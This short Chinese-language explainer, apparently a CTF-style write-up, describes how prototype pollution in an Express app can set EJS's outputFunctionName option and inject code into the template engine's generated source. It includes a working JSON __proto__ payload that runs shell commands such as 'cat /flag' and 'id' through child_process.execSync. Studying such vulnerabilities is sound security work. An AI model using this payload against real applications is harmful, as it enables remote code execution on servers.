EJS引擎的大致工作流程是
当res.render(X)执行的时候,express会把.ejs文件全部读取,并且把模板内容(也就是ejs文件)、数据对象(程序员显式传入的变量)用户输入、全局设置全部交给EJS引擎。
然后EJS引擎会执行的一段代码内容是
var src = 'var out = "";\n';
src += ' var __line = 1;\n';
src += ' try {\n';if (opts.outputFunctionName) {src += ' var ' + opts.outputFunctionName + ' = escapeFn;\n';
}
if (opts.destructuredLocals) {src += ' var { ' + opts.destructuredLocals.join(', ') + ' } = locals;\n';
}
src += ' with (locals || {}) {\n';
src += ' out += "' + templateContent + '";\n';
src += ' }\n';
src += ' return out;\n';
src += ' } catch (err) {\n';
src += ' rethrow(err, __line);\n';
src += ' }\n';
关键部分
if (opts.outputFunctionName) {src += ' var ' + opts.outputFunctionName + ' = escapeFn;\n';
}
直接用 + 把opts.outputFunctionName给拼接。
如果程序员的后端代码是这样的,那么就不存在漏洞
const express = require('express');
const app = express();
app.set('view engine', 'ejs');
app.get('/hello', (req, res) => {res.render('index', {user: 'Tom',outputFunctionName: 'Node' });
});
app.listen(3000);
因为outputFunctionName的属性值已经被声明。最终拼接的是一段无害的代码。
EJS模板注入发生在程序员没有给outputFunctionName赋值,因为这对原型链的污染才有效果。
例如注入:
{"__proto__": {"__proto__": {"outputFunctionName": "a; return global.process.mainModule.require('child_process').execSync('cat /flag').toString(); //"}}
}
那么在EJS引擎工作时,被 + 给拼接后会变成
src += var a; return global.process.mainModule.require('child_process').execSync('id').toString();// = escapeFn;
return global.process.mainModule.require('child_process').execSync('id').toString();直接独立成立一个语句,直接执行
简而言之
在程序员未设置outputFunctionName的情况下,通过原型链污染进行对outputFunctionName的赋值,在EJS引擎调用代码的时候会将outputFunctionName进行拼接,这就是EJS模板引擎注入漏洞